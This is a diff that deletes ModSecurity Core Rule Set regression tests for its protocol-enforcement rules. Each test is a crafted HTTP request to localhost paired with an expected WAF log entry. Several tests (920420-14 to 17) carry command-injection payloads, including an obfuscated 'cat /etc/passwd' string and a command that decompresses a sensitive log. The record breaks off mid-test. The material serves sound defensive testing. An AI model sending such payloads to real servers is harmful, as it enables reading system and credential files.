User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%80"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=t%FFest1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920272\""
- test_title: 920272-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%35"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920272\""
- # This will not trigger with Apache because Apache will block with AH00127
test_title: 920272-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/i%FFndex.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 404]

69
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml vendored
View file

@ -1,69 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920273.yaml"
description: "Description"
tests:
- test_title: 920273-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%20"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""
- # the '&' is one of the only symbol allowed
test_title: 920273-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1&test=t"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
data: "<hello"
output:
log_contains: "id \"920273\""
- test_title: 920273-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%5FHI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920273\""
- test_title: 920273-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1%60HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"920273\""

75
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml vendored
View file

@ -1,75 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920274.yaml"
description: "Description"
tests:
- # Apache will just error on this and return 400
# as a result we look for forbidden or 400
# In the future FTW should support OR versus AND output
# https://github.com/CRS-support/ftw/issues/19
test_title: 920274-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost%1F"
output:
status: [200, 403, 400]
# log_contains: "id \"920274\""
- test_title: 920274-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/index.html?test=test1"
headers:
User-Agent: "<ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisISATEST%5F"
output:
no_log_contains: "id \"920274\""
- test_title: 920274-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Test: "ThisIsATest%60"
output:
log_contains: "id \"920274\""
- test_title: 920274-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
uri: "/?test=test1HI"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Cookie: "ThisIsATest%60"
output:
no_log_contains: "id \"920274\""

41
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml vendored
View file

@ -1,41 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920280.yaml"
description: "Description"
tests:
- test_title: 920280-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
log_contains: "id \"920280\""
- test_title: 920280-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920280\""
- test_title: 920280-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
output:
# Technically valid but Apache doesn't allow 0.9 anymore
status: [400]

21
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml vendored
View file

@ -1,21 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920290.yaml"
description: "Description"
tests:
- # Apache will block this with a 400 and it will
# never get to CRS. We will fix this more when
# FTW supports the OR operator for outputs.
test_title: 920290-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: ""
output:
status: [403, 400]

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920300.yaml
tests:
- test_title: 920300-1
desc: Request Missing an Accept Header (920300) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/1.0
data: ''
output:
log_contains: id "920300"

80
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml vendored
View file

@ -1,80 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920310.yaml"
description: "Description"
tests:
- test_title: 920310-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: lol
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920310\""
- test_title: 920310-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Business/6.6.1.2 CFNetwork/758.5.3 Darwin/15.6.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""
- test_title: 920310-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "Entreprise/6.5.0.177 CFNetwork/758.4.3 Darwin/15.5.0"
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920310\""

42
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml vendored
View file

@ -1,42 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920311.yaml"
description: "Description"
tests:
- test_title: 920311-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
Accept: ""
output:
log_contains: "id \"920311\""
- test_title: 920311-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
Host: "localhost"
Accept: ""
output:
no_log_contains: "id \"920311\""
- test_title: 920311-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
Accept: "text/plain, text/html"
output:
no_log_contains: "id \"920311\""

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920320-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
Host: "localhost"
output:
log_contains: "id \"920320\""
- test_title: 920320-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920320\""

29
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml vendored
View file

@ -1,29 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920320.yaml"
description: "Description"
tests:
- test_title: 920330-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: ""
Host: "localhost"
output:
log_contains: "id \"920330\""
- test_title: 920330-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests Enterprise"
Host: "localhost"
output:
no_log_contains: "id \"920330\""

34
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml vendored
View file

@ -1,34 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920340.yaml"
description: "Description"
tests:
- test_title: 920340-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "2"
data: "xy"
stop_magic: true
output:
log_contains: "id \"920340\""
- test_title: 920340-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "50"
stop_magic: true
output:
expect_error: true

49
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml vendored
View file

@ -1,49 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920350.yaml"
description: "Description"
tests:
- test_title: 920350-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "127.0.0.1"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""
- test_title: 920350-2
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
output:
no_log_contains: "id \"920350\""
- test_title: 920350-3
stages:
- stage:
input:
dest_addr: "localhost"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "1.2.3.4"
protocol: "http"
uri: "/"
output:
log_contains: "id \"920350\""

29
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml vendored
View file

@ -1,29 +0,0 @@
---
meta:
author: csanders-git
description: None
# ARG_NAME_LENGTH needs to be set in crs-config
enabled: false
name: 920360.yaml
tests:
- test_title: 920360-1
desc: Argument name too long (920360) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo
version: HTTP/1.0
output:
log_contains: id "920360"

29
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml vendored
View file

@ -1,29 +0,0 @@
---
meta:
author: csanders-git
description: None
# PCRE limits need to be set higher to process this
enabled: false
name: 920370.yaml
tests:
- test_title: 920370-1
desc: Argument value too long (920370) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
version: HTTP/1.0
output:
log_contains: id "920370"

28
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml vendored
View file

@ -1,28 +0,0 @@
---
meta:
author: csanders-git
description: None
# MAX_NUM_ARGS needs to be set in crs-setup
enabled: false
name: 920380.yaml
tests:
- test_title: 920380-1
desc: Too many arguments in request (920380) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: OWASP ModSecurity Core Rule Set
method: GET
port: 80
uri: /?param1=1&param2=1&param3=1&param4=1&param5=1&param6=1&param7=1&param8=1&param9=1&param10=1&param11=1&param12=1&param13=1&param14=1&param15=1&param16=1&param17=1&param18=1&param19=1&param20=1&param21=1&param22=1&param23=1&param24=1&param25=1&param26=1&param27=1&param28=1&param29=1&param30=1&param31=1&param32=1&param33=1&param34=1&param35=1&param36=1&param37=1&param38=1&param39=1&param40=1&param41=1&param42=1&param43=1&param44=1&param45=1&param46=1&param47=1&param48=1&param49=1&param50=1&param51=1&param52=1&param53=1&param54=1&param55=1&param56=1&param57=1&param58=1&param59=1&param60=1&param61=1&param62=1&param63=1&param64=1&param65=1&param66=1&param67=1&param68=1&param69=1&param70=1&param71=1&param72=1&param73=1&param74=1&param75=1&param76=1&param77=1&param78=1&param79=1&param80=1&param81=1&param82=1&param83=1&param84=1&param85=1&param86=1&param87=1&param88=1&param89=1&param90=1&param91=1&param92=1&param93=1&param94=1&param95=1&param96=1&param97=1&param98=1&param99=1&param100=1&param101=1&param102=1&param103=1&param104=1&param105=1&param106=1&param107=1&param108=1&param109=1&param110=1&param111=1&param112=1&param113=1&param114=1&param115=1&param116=1&param117=1&param118=1&param119=1&param120=1&param121=1&param122=1&param123=1&param124=1&param125=1&param126=1&param127=1&param128=1&param129=1&param130=1&param131=1&param132=1&param133=1&param134=1&param135=1&param136=1&param137=1&param138=1&param139=1&param140=1&param141=1&param142=1&param143=1&param144=1&param145=1&param146=1&param147=1&param148=1&param149=1&param150=1&param151=1&param152=1&param153=1&param154=1&param155=1&param156=1&param157=1&param158=1&param159=1&param160=1&param161=1&param162=1&param163=1&param164=1&param165=1&param166=1&param167=1&param168=1&param169=1&param170=1&param171=1&param172=1&param173=1&param174=1&param175=1&param176=1&param177=1&param178=1&param179=1&param180=1&param181=1&param182=1&param183=1&param184=1&param185=1&param186=1&param187=1&param188=1&param189=1&param190=1&param191=1&param192=1&param193=1&param194=1&param195=1&param196=1&param197=1&param198=1&param199=1&param200=1&param201=1&param202=1&param203=1&param204=1&param205=1&param206=1&param207=1&param208=1&param209=1&param210=1&param211=1&param212=1&param213=1&param214=1&param215=1&param216=1&param217=1&param218=1&param219=1&param220=1&param221=1&param222=1&param223=1&param224=1&param225=1&param226=1&param227=1&param228=1&param229=1&param230=1&param231=1&param232=1&param233=1&param234=1&param235=1&param236=1&param237=1&param238=1&param239=1&param240=1&param241=1&param242=1&param243=1&param244=1&param245=1&param246=1&param247=1&param248=1&param249=1&param250=1&param251=1&param252=1&param253=1&param254=1&param255=1&param256=1
version: HTTP/1.0
output:
log_contains: id "920380"

32
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml vendored
View file

File diff suppressed because one or more lines are too long

50
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml vendored
View file

@ -1,50 +0,0 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 920400.yaml
tests:
- test_title: 920400-1
desc: Uploaded file size too large (920400) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Length: '10485760'
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
-----------------------------265001916915724
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: application/octet-stream
Rotem & Ayala
-----------------------------265001916915724
Content-Disposition: form-data; name="name"
tt2
-----------------------------265001916915724
Content-Disposition: form-data; name="B1"
Submit
-----------------------------265001916915724--
output:
# Most web servers simply won't respond to invalid requests like
# like this they'll just time out when we get OR type checks
# we'll be able to check for both an error or the rule firing
expect_error: true

334
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml vendored
View file

@ -1,334 +0,0 @@
---
meta:
author: "csanders-git, Franziska Bühler"
enabled: true
name: "920420.yaml"
description: "Description"
tests:
- test_title: 920420-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"920420\""
- test_title: 920420-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "POST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
- test_title: 920420-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "GET"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
- test_title: 920420-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "PROPFIND"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "my-new-content-type"
data: "test"
output:
log_contains: "id \"920420\""
- test_title: 920420-5
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
--0000
Content-Disposition: form-data; name="name"
John Smith
--0000
Content-Disposition: form-data; name="email"
john.smith@example.com
--0000
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg
BINARYDATA
--0000--
output:
log_contains: id "920420"
- test_title: 920420-6
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
--0000
Content-Disposition: form-data; name="name"
John Smith
--0000
Content-Disposition: form-data; name="email"
john.smith@example.com
--0000
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg
BINARYDATA
--0000--
output:
log_contains: id "920420"
- test_title: 920420-7
desc: Request content type is not allowed by policy (920420) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Content-Type: application/foo; boundary=0000
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data: |
--0000
Content-Disposition: form-data; name="name"
John Smith
--0000
Content-Disposition: form-data; name="email"
john.smith@example.com
--0000
Content-Disposition: form-data; name="image"; filename="image.jpg"
Content-Type: image/jpeg
BINARYDATA
--0000--
output:
log_contains: id "920420"
- test_title: 920420-8
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "my-new-content-type"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
log_contains: "id \"920420\""
- test_title: 920420-9
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/json"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
no_log_contains: "id \"920420\""
- test_title: 920420-10
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application/soap+xml"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
no_log_contains: "id \"920420\""
- test_title: 920420-11
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "application"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
log_contains: "id \"920420\""
- test_title: 920420-12
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "multipart/related"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
no_log_contains: "id \"920420\""
- test_title: 920420-13
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "HEAD"
headers:
User-Agent: "OWASP ModSecurity Core Rule Set"
Host: "localhost"
Content-Type: "Multipart/Related"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
data: "test"
output:
no_log_contains: "id \"920420\""
- test_title: 920420-14
stages:
- stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: OWASP ModSecurity Core Rule Set
Host: "localhost"
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Content-Type: text/plain
data: 'cmd=/bin/unxz -c /var/log/something_sensitive.xz'
protocol: "http"
output:
log_contains: "id \"920420\""
- test_title: 920420-15
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Proxy-Connection: keep-alive
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: text/plain
method: GET
port: 80
uri: /
version: HTTP/1.0
data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
output:
log_contains: "id \"920420\""
- test_title: 920420-16
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Proxy-Connection: keep-alive
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/x-amf
method: GET
port: 80
uri: /
version: HTTP/1.0
data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
output:
log_contains: "id \"920420\""
- test_title: 920420-17
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Proxy-Connection: keep-alive
User-Agent: OWASP ModSecurity Core Rule Set
Content-Type: application/octet-stream
method: GET
port: 80
uri: /
version: HTTP/1.0
data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}"
output:
log_contains: "id \"920420\""

161
src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml vendored
View file

@ -1,161 +0,0 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920430.yaml"
description: "Description"
tests:
- test_title: 920430-1
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
- test_title: 920430-2
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/1.0"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
- test_title: 920430-3
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/0.9"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
- test_title: 920430-4
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "HTTP/2"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"920430\""
- # Currently FTW won't process HTTP 1.0 simple response items
# This request generates such a response, so even though it will
# generate the alert, it will error.
test_title: 920430-5
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: ""
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
expect_error: true
- test_title: 920430-6
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "1.1"
headers:
User-Agent: "ModSecurity CRS 3 Tests #FN"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
- test_title: 920430-7
stages:
- stage:
input:
dest_addr: "127.0.0.1"
port: 80
version: "TEST"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
status: [403, 400]
# log_contains: "id \"920430\""
- test_title: 920430-8
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: /
version: HTTP/3.0
output:
log_contains: id "920430"
- test_title: 920430-9
desc: HTTP protocol version is not allowed by policy (920430) from old modsec regressions
stages:
- stage:
input:
dest_addr: 127.0.0.1
headers:
